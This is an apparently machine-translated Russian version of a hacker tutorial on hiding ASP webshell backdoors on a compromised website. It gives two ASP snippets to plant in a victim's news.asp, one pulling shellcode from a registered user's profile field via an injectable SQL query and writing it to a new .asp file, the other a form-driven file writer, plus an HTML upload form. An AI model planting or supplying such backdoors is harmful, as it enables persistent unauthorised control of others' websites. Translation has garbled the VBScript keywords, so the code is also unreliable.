Предисловие: Прошло много времени, от первоначального менеджера сайта до нескольких популярных бэкдоров ASP. Я считаю, что большинство сетевых администраторов могут назвать эти классические веб-шеллы, такие как Haiyang, Veteran, Blue Screen и т. д. Я также считаю, что большинство. сетевые администраторы могут назвать их. Я изучил метод поиска по ключевым словам для поиска этих троянов. Конечно, если вы хотите скрыть бэкдор в наше время, вам нужно использовать некоторые навыки. Как говорится: «Будда - одна нога». высокий, а мой рост один фут».
Я не отрицаю, что запись asp-трояна в файл изображения, как упоминалось ранее, является хорошим методом. На самом деле его можно записать не только в изображения, но и в mp3-файлы и в doc-файлы.
Методкопирования имени файла/параметра + имени файла/параметра для создания имени файла
можно гибко использовать для достижения цели сокрытия файлов. Конкретные параметры: /a в режиме acsic-кода, /b в двоичном режиме, поэтому я выиграю. Не буду вдаваться в подробности. Что касается загрузки веб-шелла, то, что такое веб-шелл, не входит в задачу этой статьи. Сегодня мы поговорим о том, как поместить бэкдор в базу данных с суффиксом .mdb. Предполагается, что после того, как мы получим веб-шелл...
Как мы знаем, многим сайтам приходится заполнять множество вещей, когда. регистрация пользователей, например: имя пользователя, пароль, QQ, адрес электронной почты, личный профиль, номер телефона, контактная информация, адрес и т. д. Также будут соответствующие таблицы, поля и значения, соответствующие базе данных. Сегодня я хочу зарегистрировать пользователя и написать шелл-код в своем личном профиле, а затем изменить файл на его сайте. Когда этот файл сработает при его использовании, я помещу шелл-код в свое личное резюме. до текущего каталога.
Без лишних слов, давайте взглянем на код:
<%
если запрос("действие")="firefox" тогда
fname=request.querystring("fn")
tname=request.querystring("tn")
bname=request.querystring("bn")
id=request.querystring("id")
idvalue=request.querystring("idv")
set rs=server.createobject("ADODB.recordset")
sql="select "& bname & " from "&tname& " где "&id&"="&idvalue&""""
rs.open sql,conn,1,3
если не rs.eof, то
контент = rs (имя б)
еще
ответ.пишите «Ничего»
конец, если
set fso=Server.createObject("Scripting.FileSystemObject")
set txtfile=fso.createtextfile(server.mappath(fname))
txtfile.writeline(содержимое)
txtfile.close
конец, если
%>
Добавьте приведенный выше код в файл на сайте, например news.asp. По известной нам информации, после регистрации на его сайте скачайте базу данных, чтобы увидеть структуру. Имя Firefox, которое я зарегистрировал, находится в таблице пользователей, а значение его идентификатора — 119. Поле таблицы, используемое для хранения моего зарегистрированного резюме, — jl.
news.asp?action=firefox&fn=firefox.asp&tn=user&bn=jl&id=id&idv=119
Затем при его использовании мы можем написать веб-оболочку с именем firefox.asp в том же каталоге, что и news.asp. Можно сказать, что вышеописанный метод сокрытия является одним из тысяч. Далее давайте поговорим о другом, более удобном методе сокрытия. Этот метод не имеет ничего общего с суффиксом mdb.
Аналогичным образом мы по-прежнему модифицируем news.asp и вставляем следующий код в news.asp другой стороны:
<%
если запрос("действие")="firefox" тогда
n=request.form("n")
c=request.form("c")
set fso=Server.createObject("Scripting.FileSystemObject")
set txtfile=fso.createtextfile(server.mappath(n))
txtfile.writeline (с)
txtfile.close
конец, если
%>
Этот код относительно прост, его можно рассматривать как серверную часть троянского коня. Используйте этот код при его использовании:
<HTML><ГОЛОВКА>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<title>Первый технологический альянс Firefox[www.wrsky.com]</title>
<FORM action=" http://localhost/config.asp?action ... метод=post>
<META content="MSHTML 6.00.2900.2180" name=GENERATOR></HEAD>
<BODY>Имя:<Размер ВХОДА=50
name=n width="32"><BR><BR>Оболочка:<TEXTAREA name=c rows=10 cols=80
width="32"></TEXTAREA><INPUT type=submit value=Save></FORM></BODY></HTML>
Измените приведенный выше код: "http://localhost/config.asp?action= Замените «firefox» с адресом вашего сервера и сохраните его как локальный файл .htm. После локального открытия определите имя файла, его содержимое и удаленную отправку, которая будет сгенерирована. Хорошо, это еще один способ выйти из бэкдора.